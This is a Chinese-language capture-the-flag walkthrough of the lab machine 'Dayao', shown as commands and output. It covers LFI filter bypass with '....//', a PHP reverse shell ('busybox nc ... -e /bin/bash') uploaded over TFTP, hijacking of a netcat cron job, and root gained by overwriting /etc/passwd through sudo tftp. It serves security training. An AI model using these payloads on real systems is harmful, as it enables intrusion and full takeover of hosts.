MazeSec-Dayao-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.197  08:00:27:28:d7:cf       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:ef:12:9a       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.027 seconds (126.30 hosts/sec). 4 responded
❯ export ip=192.168.60.197
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Where scanning meets swagging. 😎

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.197:22
Open 192.168.60.197:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-27 08:21 CST
Initiating ARP Ping Scan at 08:21
Scanning 192.168.60.197 [1 port]
Completed ARP Ping Scan at 08:21, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:21
Completed Parallel DNS resolution of 1 host. at 08:21, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 08:21
Scanning 192.168.60.197 [2 ports]
Discovered open port 80/tcp on 192.168.60.197
Discovered open port 22/tcp on 192.168.60.197
Completed SYN Stealth Scan at 08:21, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.197
Host is up, received arp-response (0.00045s latency).
Scanned at 2025-05-27 08:21:59 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:28:D7:CF (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

目录枚举

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.197
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 2078]
/uploads              (Status: 301) [Size: 318] [--> http://192.168.60.197/uploads/]
/upload.php           (Status: 200) [Size: 0]
/file.php             (Status: 200) [Size: 0]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

猜测file.php存在LFI文件包含

尝试模糊测试一下

结果一直测不出来，双写../绕过才行，后端大概进行过滤了

❯ wfuzz -c  -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://$ip/file.php?FUZZ=....//....//....//....//etc/passwd" --hw 0
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.197/file.php?FUZZ=....//....//....//....//etc/passwd
Total requests: 220559

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000759:   200        27 L     40 W       1450 Ch     "file"
 /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...
^C
Total time: 11.87149
Processed Requests: 1830
Filtered Requests: 1829
Requests/sec.: 154.1507

得到存在wujing用户

❯ curl -s "http://192.168.60.197/file.php?file=....//....//....//....//etc/passwd" |grep /bin/bash
root:x:0:0:root:/root:/bin/bash
wujing:x:1000:1000:,,,:/home/wujing:/bin/bash

我尝试利用php filter来查看upload.php源码，无果

Tftp 文件上传

发现存在tftp用户，猜测可以存在tftp服务，并且通常会监听UDP 69端口

nmap扫一下udp协议

显示开放或者被过滤的状态

❯ nmap -sU -sV --version-intensity 0 -n  -T4 $ip -p69
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-27 09:28 CST
Nmap scan report for 192.168.60.197
Host is up (0.00048s latency).

PORT   STATE         SERVICE VERSION
69/udp open|filtered tftp
MAC Address: 08:00:27:28:D7:CF (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.58 seconds

tftp不需要进行登录，它是一种无状态、无认证的协议

而且并不支持文件浏览功能

可以使用msfconsole来检查是否可以上传文件

msf6 auxiliary(admin/tftp/tftp_transfer_util) > set RHOST 192.168.60.197
RHOST => 192.168.60.197
msf6 auxiliary(admin/tftp/tftp_transfer_util) > set FILEDATA <?php `busybox nc 192.168.60.100 4444 -e /bin/bash`;?>
FILEDATA => <?php `busybox nc 192.168.60.100 4444 -e /bin/bash`;?>
msf6 auxiliary(admin/tftp/tftp_transfer_util) > set FILENAME rev.php
FILENAME => rev.php
msf6 auxiliary(admin/tftp/tftp_transfer_util) > run

[*] Sending 'DATA:<?php `busybox nc 192.168.60.100 4444 -e /bin/bash`;?>' to 192.168.60.197:69 as 'rev.php'
[+] 192.168.60.197:69 WRQ accepted, sending the file.
[+] 192.168.60.197:69 Sending 54 bytes (1 blocks)
[+] 192.168.60.197:69 Transferred 54 bytes in 1 blocks, upload complete!
[*] 192.168.60.197:69 TFTP transfer operation complete.
[*] Auxiliary module execution completed

直接访问$ip/rev.php即可收到反弹的shell

用户提权

监听端口

❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.60.100
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from Dayao-192.168.60.197-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/Dayao~192.168.60.197_Linux_x86_64/2025_05_27-09_47_45-863.log 📜
───────────────────────────────────────────────────────────────────────────
www-data@Dayao:/var/www/html$ cat file.php
<?php
// vuln.php
if(isset($_GET['file'])) {
    $file = $_GET['file'];
    // 过滤../防止目录遍历（故意留缺陷）
    $file = str_replace('../', '', $file);
    // 使用file_get_contents实现文件读取
    echo file_get_contents('/var/www/html/'.$file);
}
?>

查看了源代码

发现file_get_contents在开头拼接了/var/www/html/所以才导致无法通过php://filter读取文件

相关tftp配置

www-data@Dayao:/opt$ cat /etc/default/tftpd-hpa
TFTP_USERNAME="tftp"
TFTP_DIRECTORY="/var/www/html"
TFTP_ADDRESS="0.0.0.0:69"
TFTP_OPTIONS="--secure --create"

没找到线索，上传pspy64看下有没有定时任务

2025/05/26 22:07:01 CMD: UID=0     PID=1775   | /usr/sbin/CRON -f
2025/05/26 22:07:01 CMD: UID=0     PID=1776   | /usr/sbin/CRON -f
2025/05/26 22:07:01 CMD: UID=1000  PID=1777   | /bin/sh -c nc -e /bin/bash 127.0.0.1 1234

本地监听一下1234端口

完善tty终端

www-data@Dayao:/tmp$ busybox nc -lp 1234
id
uid=1000(wujing) gid=1000(wujing) groups=1000(wujing)
script -qc /bin/bash
wujing@Dayao:~$ ^Z
[1]+  Stopped                 busybox nc -lp 1234
www-data@Dayao:/tmp$ stty raw -echo;fg
busybox nc -lp 1234
                   reset
reset: unknown terminal type unknown
Terminal type? xterm

Root提权

得到完整的shell

拥有sudo权限，可以执行tftp

wujing@Dayao:~$ cat user.txt
flag{user-c7279ae7-37d3-11f0-89d7-000c2955ba04}
wujing@Dayao:~$ sudo -l
Matching Defaults entries for wujing on Dayao:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User wujing may run the following commands on Dayao:
    (ALL) NOPASSWD: /usr/bin/tftp

由于tftp配置文件中的目录/var/www/html

所以复制passwd到/var/www/html

再利用get下载到/etc下就实现覆盖文件内容了

wujing@Dayao:~$ cd /var/www/html/
wujing@Dayao:/var/www/html$ cp /etc/passwd .
wujing@Dayao:/var/www/html$ echo 'primary:zSZ7Whrr8hgwY:0:0::/root:/bin/bash'>>passwd
wujing@Dayao:/var/www/html$ cd /etc/
wujing@Dayao:/etc$ sudo /usr/bin/tftp 127.0.0.1
tftp> get passwd
Received 1521 bytes in 0.0 seconds
tftp> q

直接切换用户即可

wujing@Dayao:/etc$ su primary
Password:
root@Dayao:/etc# id
uid=0(root) gid=0(root) groups=0(root)
root@Dayao:/etc# cat /root/root.txt
flag{root-e6328734-37d3-11f0-af3b-000c2955ba04}